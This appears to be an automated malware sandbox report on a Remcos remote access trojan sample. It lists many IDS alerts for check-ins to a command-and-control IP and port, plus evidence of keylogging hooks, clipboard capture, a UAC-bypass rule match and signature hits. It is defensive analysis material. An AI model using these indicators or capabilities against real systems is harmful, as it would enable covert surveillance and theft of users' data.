                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49708 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49719 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49769 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49750 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49817 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49782 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49849 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49833 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49891 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49878 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49864 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49906 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49931 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49948 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49962 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49975 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49992 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50000 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50002 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49998 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50009 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50006 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50007 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50010 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50013 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49997 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50017 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50018 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50021 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50014 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50023 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50003 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50024 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50011 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50027 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50012 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50020 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50008 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50025 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50019 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50028 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50015 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49798 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50037 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50022 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50040 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50035 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50026 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50031 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50046 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50049 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50053 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50030 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50055 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50032 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50039 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50036 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50044 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50064 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50033 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50048 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50043 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50041 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50029 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50059 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50069 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50051 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50071 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50052 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50034 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50066 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50072 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50067 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50038 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50057 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50077 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50070 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50080 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50079 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50045 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50042 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50076 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50060 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50084 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50004 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50085 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49735 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50078 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50090 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50061 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50081 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50063 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50101 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50068 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50075 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50001 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50104 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50098 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50100 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50082 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50103 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50016 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50062 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50089 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50083 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50105 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50102 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50093 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50088 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50092 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50096 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50056 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50087 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50094 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50054 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50086 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50074 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50065 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50095 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50058 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50091 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50005 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50099 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50073 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50047 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50050 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:50097 -> 192.210.150.26:3678
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49918 -> 192.210.150.26:3678
                        Source: Malware configuration extractorIPs: 192.210.150.26
                        Source: Joe Sandbox ViewIP Address: 192.210.150.26 192.210.150.26
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040455B WaitForSingleObject,SetEvent,recv,1_2_0040455B
                        Source: NssBkEQKsI.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: NssBkEQKsI.exeString found in binary or memory: http://geoplugin.net/json.gp/C

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000001_2_004099E4
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\NssBkEQKsI.exeJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,1_2_00409B10
                        Source: Yara matchFile source: NssBkEQKsI.exe, type: SAMPLE
                        Source: Yara matchFile source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: NssBkEQKsI.exe, type: SAMPLE
                        Source: Yara matchFile source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.3721678274.000000000232F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041BB77 SystemParametersInfoW,1_2_0041BB77

                        System Summary

                        barindex
                        Source: NssBkEQKsI.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: NssBkEQKsI.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: NssBkEQKsI.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,1_2_0041ACC1
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,1_2_0041ACED
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,1_2_004158B9
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041D0711_2_0041D071
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004520D21_2_004520D2
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043D0981_2_0043D098
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004371501_2_00437150
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004361AA1_2_004361AA
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004262541_2_00426254
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004313771_2_00431377
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043651C1_2_0043651C
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041E5DF1_2_0041E5DF
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0044C7391_2_0044C739
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004367C61_2_004367C6
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004267CB1_2_004267CB
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043C9DD1_2_0043C9DD
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00432A491_2_00432A49
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00436A8D1_2_00436A8D
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043CC0C1_2_0043CC0C
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00436D481_2_00436D48
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00434D221_2_00434D22
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00426E731_2_00426E73
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00440E201_2_00440E20
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043CE3B1_2_0043CE3B
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00412F451_2_00412F45
